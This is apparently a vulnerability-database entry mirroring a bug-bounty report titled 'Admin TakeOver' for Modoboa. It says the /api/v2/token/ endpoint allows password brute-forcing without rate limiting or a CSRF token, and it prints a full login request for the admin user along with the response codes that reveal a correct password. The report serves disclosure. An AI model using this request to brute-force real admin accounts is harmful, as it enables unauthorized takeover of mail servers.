Lucene search

7h3h4ckv157A17E7A9F-0FEE-4130-A522-5A0466FC17C7

HistoryJan 26, 2023 - 6:43 p.m.

Admin TakeOver

2023-01-2618:43:28

7h3h4ckv157

www.huntr.dev

endpoint security

csrf token

unauthorized access

EPSS

0.028

Percentile

90.8%

JSON

Description

The endpoint /api/v2/token/ allows an unauthorized user to perform brute-forcing and the app doesn’t block the request which not having any SESSION COOKIE or even CSRF token

Request


POST /api/v2/token/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------25524418606542250161357131552
Content-Length: 301
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Gpc: 1
Te: trailers
Connection: close

-----------------------------25524418606542250161357131552
Content-Disposition: form-data; name="username"

admin
-----------------------------25524418606542250161357131552
Content-Disposition: form-data; name="password"

{PASSWORD-HERE}
-----------------------------25524418606542250161357131552--

This request returns 2 types of response codes.

--&gt; HTTP/1.1 401 Unauthorized ::  For Incorrect Password
--&gt; HTTP/1.1 200 OK   :: For Correct Password

Proof Of Concept

References

www.google.com/search?q=rate+limit+account+takeover

EPSS

0.028

Percentile

90.8%

JSON

Related for A17E7A9F-0FEE-4130-A522-5A0466FC17C7